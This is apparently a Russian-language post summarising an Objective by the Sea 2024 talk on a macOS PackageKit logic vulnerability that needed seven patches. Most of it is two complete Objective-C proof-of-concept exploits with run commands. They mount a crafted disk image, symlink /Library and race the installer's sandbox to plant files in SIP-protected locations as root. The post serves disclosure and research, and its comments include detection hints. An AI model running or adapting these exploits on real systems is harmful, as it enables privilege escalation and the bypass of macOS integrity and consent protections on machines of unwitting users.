Макаводам на заметку. Доклад про то, как Apple всё никак не может закрыть логическую уязвимость в PackageKit framework, которая позволяет повысить права до root в macOS с обходом Transparency, Consent, and Control (TCC) и System Integrity Protection (SIP). Для этой уязвимости было выпущено 7 патчей: CVE-2022-26688, CVE-2022-32900, CVE-2023-23497, CVE-2023-27962, CVE-2023-38564, CVE-2023-42853, CVE-2024-23275.
[Objective by the Sea 2024] Endless Exploits: The Saga of a macOS Vulnerability Exploited Seven Times
Описание
How many patches must Apple release, before a vulnerability is truly fixed? The answer, my friend, is “blowin' in the wind” :P
In this talk, I will delve into an interesting logic vulnerability discovered in the PackageKit framework on macOS that allows for escalating privileges to root, circumventing Transparency, Consent, and Control (TCC), and bypassing System Integrity Protection (SIP). Many third-party applications are also affected by this vulnerability because of a wrong assumption in the minds of their developers! Even more interesting is the cat-and-mouse game between Apple's patching endeavors and my persistent bypass techniques.
It’s hard to believe that Apple released 7 patches in attempts to address the vulnerability before ultimately resolving it. Throughout this epic battle, I managed to harvest a series of CVEs: CVE-2022-26688, CVE-2022-32900, CVE-2023-23497, CVE-2023-27962, CVE-2023-38564, CVE-2023-42853 and CVE-2024-23275. I will discuss each of them in turn, detailing Apple's patches, as well as demonstrating how I've bypassed and exploited them multiple times.
Видео
Слайды
https://objectivebythesea.org/v7/talks/OBTS_v7_mJin.pdf
Run the exploit program with root, e.g., sudo ./exploit /tmp/sip_bypass /Library/Apple/sip_bypass
Install the Apple-signed pkg: sudo installer -pkg PagesEndNote.pkg -target /tmp/.exploit
exploit.m
Objective-C:
#import <Foundation/Foundation.h>
#include <sys/stat.h>
#include <dirent.h>
#include <libgen.h>
// Mount point for the attacker-controlled disk image; the installer is later
// pointed at this path as its -target (see the usage notes above the listing).
#define MOUNT_DIR "/tmp/.exploit"
// Stages the payload on a freshly created, user-controlled disk image.
//   src: file to be planted; copied into <MOUNT_DIR>/Root<dst>.
//   dst: destination path; must begin with "/Library" (hard-coded check below).
// Side effects: creates disk.dmg in the current directory, mounts it at
// MOUNT_DIR, and places a "Library" symlink at the mount root pointing at the
// real /Library. Exits the process on a bad dst prefix.
void prepare(const char *src, const char *dst) {
    // strncmp returns non-zero when dst does NOT start with "/Library".
    if (strncmp(dst, "/Library", 8)) {
        printf("[!] dst path must be start with '/Library' (sorry for the hardcode).\n");
        exit(-1);
    }
    printf("[*] preparing the dmg mounting...\n");
    mkdir(MOUNT_DIR, 0777);
    system("hdiutil create -size 10m -volname .exploit -ov disk.dmg");
    system("hdiutil attach disk.dmg -mountpoint "MOUNT_DIR);
    printf("[*] preparing the payload...\n");
    char cmd[MAXPATHLEN] = {0};
    // Builds "<MOUNT_DIR>/Root/<dirname of dst>" via the shell; dst comes from
    // argv and is interpolated unescaped. The strdup'd copy is never freed.
    snprintf(cmd, MAXPATHLEN, "mkdir -p "MOUNT_DIR"/Root%s", dirname(strdup(dst)));
    system(cmd);
    snprintf(cmd, MAXPATHLEN, "cp %s "MOUNT_DIR"/Root%s", src, dst);
    system(cmd);
    // The symlink makes <MOUNT_DIR>/Library resolve to the real, SIP-protected
    // /Library. From a defender's view this is the tell: a "Library" entry on
    // an installer target volume that is a symlink rather than a directory.
    symlink("/Library", MOUNT_DIR"/Library");
    printf("[*] all the preparations are done.\n");
}
// Removes the disk image and the mount directory created by prepare().
// Note: nothing in this listing's main() calls it.
void cleanup(void) {
    unlink("disk.dmg");
    system("rm -rf "MOUNT_DIR);
}
// the payload to be shoved from the path:
// $MOUNT_DIR/.PKInstallSandboxManager-SystemSoftware/2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox/Root
// Races the installer: waits until a sandbox directory appears under
// <MOUNT_DIR>/.PKInstallSandboxManager-SystemSoftware, then waits until its
// "Root" subdirectory is readable and renames the staged <MOUNT_DIR>/Root
// over it. Relies on the installer picking up the replaced Root afterwards
// (a time-of-check/time-of-use window; the exact ordering is not visible here).
// Exits the process if the rename fails.
void fire_the_hole(void) {
    DIR *dp = NULL;
    struct dirent *ep = NULL;
    char *sandbox = NULL;
    char path[MAXPATHLEN] = {0};
    // Busy-poll (no sleep) until the sandbox repository directory exists and
    // contains an entry of the expected name length.
    while (1) {
        dp = opendir(MOUNT_DIR"/.PKInstallSandboxManager-SystemSoftware");
        if (NULL == dp) continue;
        while ((ep = readdir (dp))) {
            // Matches by length only: UUID (36) + ".activeSandbox" (14) = 50 = 0x32.
            if (strlen(ep->d_name) == 0x32) { //strlen("2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox")==0x32
                // d_name points into the DIR buffer; dp is intentionally left
                // open here so the pointer stays valid for the snprintf below.
                sandbox = ep->d_name;
                printf("[*] Got Sandbox:%s.\n", sandbox);
                goto NEXT1;
            }
        }
        closedir (dp);
    }
NEXT1:
    snprintf(path, MAXPATHLEN, MOUNT_DIR"/.PKInstallSandboxManager-SystemSoftware/%s/Root", sandbox);
    // Spin until the installer has created the sandbox's Root directory.
    while (-1 == access(path, R_OK)) {
        //printf("[*] try to access: %s, errno:%d, waiting...\n", path, errno);
    }
    // Swap the staged payload tree in place of the installer's Root.
    // Detection angle: a rename() over .../<uuid>.activeSandbox/Root by a
    // process other than the installer daemon during an active install.
    if (0 != rename(MOUNT_DIR"/Root", path)) {
        printf("[!] failed to move our payload to path:%s, errno=%d\n", path, errno);
        exit(-1);
    }
    printf("[*] exploit successfully :D\n");
}
// Entry point: expects exactly two arguments (source file, /Library/... dst).
// The argc check only prints usage and falls through; with fewer than three
// arguments prepare() is still called with argv[1]/argv[2].
int main(int argc, const char * argv[]) {
    if (argc != 3) {
        printf("Usage: %s /path/to/src /Library/*/dst\n", argv[0]);
    }
    prepare(argv[1], argv[2]);
    fire_the_hole();
    return 0;
}
Демо
Run the exploit program with root
Install the Apple-signed pkg: sudo installer -pkg PagesEndNote.pkg -target /tmp/.exploit
exploit.m
Objective-C:
#import <Foundation/Foundation.h>
#include <sys/stat.h>
#include <dirent.h>
#include <libgen.h>
// Mount point for the attacker-controlled disk image (the installer -target).
#define MOUNT_DIR "/tmp/.exploit"
// Where the installer creates its per-install sandbox directories on the target.
#define SBX_REPO MOUNT_DIR"/.PKInstallSandboxManager-SystemSoftware"
// Directory tree that will be symlinked in place of the real sandbox.
#define FAKE_SBX "/tmp/fakebox"
// Payload location inside the fake sandbox, mirroring /Library/Apple/sip_bypass.
#define FAKE_ROOT_PAYLOAD FAKE_SBX"/Root/Library/Apple/sip_bypass"
// Stages the fake sandbox tree and mounts a fresh disk image at MOUNT_DIR.
// Side effects: creates /tmp/fakebox/Root/Library/Apple/sip_bypass (as a
// directory, via mkdir -p), creates and attaches /tmp/disk.dmg, and places a
// "Library" symlink at the mount root pointing at the real /Library.
// Return values of system()/symlink() are not checked.
void prepare(void) {
    printf("[*] preparing the payload...\n");
    system("mkdir -p "FAKE_ROOT_PAYLOAD);
    printf("[*] preparing the dmg mounting...\n");
    system("mkdir -p "MOUNT_DIR);
    system("hdiutil create -size 10m -volname .exploit -ov /tmp/disk.dmg");
    system("hdiutil attach /tmp/disk.dmg -mountpoint "MOUNT_DIR);
    // Same tell as in the first variant: a symlinked "Library" on the target
    // volume redirects writes into the SIP-protected /Library.
    symlink("/Library", MOUNT_DIR"/Library");
    printf("[*] all the preparations are done.\n");
}
// Removes /tmp/disk.dmg and the mount directory. Not called from this
// listing's main(); FAKE_SBX is left in place.
void cleanup(void) {
    unlink("/tmp/disk.dmg");
    system("rm -rf "MOUNT_DIR);
}
// Blocks until a line containing `hint` is appended to /var/log/install.log.
// Records the current end-of-file offset first so only lines written after
// the call are considered, then re-opens and re-reads from that offset in a
// tight loop (no sleep). fopen() results are not checked.
//   hint: substring to look for (matched with strstr on each new line).
void spin_for_log(const char *hint) {
    static const char *log_path = "/var/log/install.log";
    FILE *fp = NULL;
    char line[4096] = {0};
    // Snapshot the current log size so pre-existing lines are skipped.
    fp = fopen(log_path, "r");
    fseek(fp, 0, SEEK_END);
    long size = ftell(fp);
    fclose(fp);
    int found = 0;
    while (1) {
        fp = fopen(log_path, "r");
        fseek(fp, size, SEEK_SET);
        while (fgets(line, sizeof(line), fp) != NULL) {
            //printf("install.log: %s", line);
            if (strstr(line, hint)) {
                found = 1;
                break;
            }
        }
        // Advance the offset so already-scanned lines are not re-read.
        size = ftell(fp);
        fclose(fp);
        if (found) {
            break;
        }
    }
}
// the payload to be shoved from the path:
// $MOUNT_DIR/.PKInstallSandboxManager-SystemSoftware/2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox/Root
// Second variant of the race: waits for the installer's sandbox directory to
// appear under SBX_REPO, waits for the install-scripts log line, then deletes
// that sandbox directory and replaces it with a symlink to FAKE_SBX so that
// the installer's subsequent use of <sandbox>/Root resolves into the fake tree.
// Errors from removeItemAtPath: and symlink() are ignored.
void fire_the_hole(void) {
    DIR *dp = NULL;
    struct dirent *ep = NULL;
    char *sandbox = NULL;
    char path[MAXPATHLEN] = {0};
    // Busy-poll until SBX_REPO exists and holds an entry of the expected length.
    while (1) {
        dp = opendir(SBX_REPO);
        if (NULL == dp) continue;
        while ((ep = readdir (dp))) {
            // Length-only match: UUID (36) + ".activeSandbox" (14) = 0x32.
            if (strlen(ep->d_name) == 0x32) { //strlen("2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox")==0x32
                // d_name lives in the DIR buffer; dp is left open so it stays valid.
                sandbox = ep->d_name;
                printf("[*] Got Sandbox:%s.\n", sandbox);
                goto NEXT1;
            }
        }
        closedir (dp);
    }
NEXT1:
    snprintf(path, MAXPATHLEN, SBX_REPO"/%s", sandbox);
    // Synchronize on the installer's own log output before swapping.
    spin_for_log("1 Install Scripts run.");
    // Replace the whole sandbox directory with a symlink into /tmp/fakebox.
    // Detection angle: the installer's sandbox path becoming a symlink, or an
    // unlink of .../<uuid>.activeSandbox by a non-installer process mid-install.
    [[NSFileManager defaultManager]removeItemAtPath:[NSString stringWithUTF8String:path] error:0];
    symlink(FAKE_SBX, path);
    printf("[*] exploit successfully :D\n");
}
// Entry point: takes no arguments; stages the fake sandbox and mount, then
// runs the race. cleanup() is never invoked.
int main(int argc, const char * argv[]) {
    prepare();
    fire_the_hole();
    return 0;
}
Демо
https://github.com/jhftss/POC